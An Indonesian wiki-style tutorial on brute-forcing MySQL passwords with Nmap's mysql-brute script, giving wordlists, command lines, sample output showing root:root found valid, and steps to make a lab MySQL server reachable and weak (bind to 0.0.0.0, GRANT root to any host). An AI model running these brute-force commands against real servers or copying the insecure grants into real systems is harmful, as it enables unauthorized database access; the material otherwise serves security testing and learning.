Nmap: brute force hack mysql password: Difference between revisions

Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html

Script types: portrule
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/mysql-brute.nse

Lakukan hack pada password MySQL.

isi

user.txt

admin
root
dll

isi

pass.txt

123456
123456789
dll

nmap --script=mysql-brute <target>
Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt --script-trace  192.168.0.100
Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt --script-trace 192.168.0.100

Defaut daftar usernames & passwords ada di

/usr/share/nmap/nselib/data

File

usernames.lst
passwords.lst

3306/tcp open  mysql
| mysql-brute:
|   Accounts
|     root:root - Valid credentials

Serangan ini hanya bisa di jalankan kalau mysql salah di konfigurasi

• MySQL yang normal hanya binding ke localhost, artinya hanya mereka yang di localhost yang dapat menyerang.
• MySQL di binding ke interface ethernet, atau ke semua interface, caranya

vi /etc/mysql/mysql.conf.d/mysqld.cnf 

# bind-address          = 127.0.0.1
bind-address            = 0.0.0.0
max_connections         = 1000

• beri akses root ke IP attacker, atau ke semua IP (asumsi password root=123456)

mysql -u root -p123456

GRANT ALL ON *.* to root@'123.123.123.123' IDENTIFIED BY 'put-your-password';
FLUSH PRIVILEGES;
exit

atau

GRANT ALL ON *.* to root@'%' IDENTIFIED BY '123456';
FLUSH PRIVILEGES;
exit

• cek menggunakan perintah (asumsi password=123456)

mysql -u root -h ip-address-server -p123456

Akan keluar

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 50069
Server version: 5.7.11-0ubuntu6 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

• https://nmap.org/nsedoc/scripts/mysql-brute.html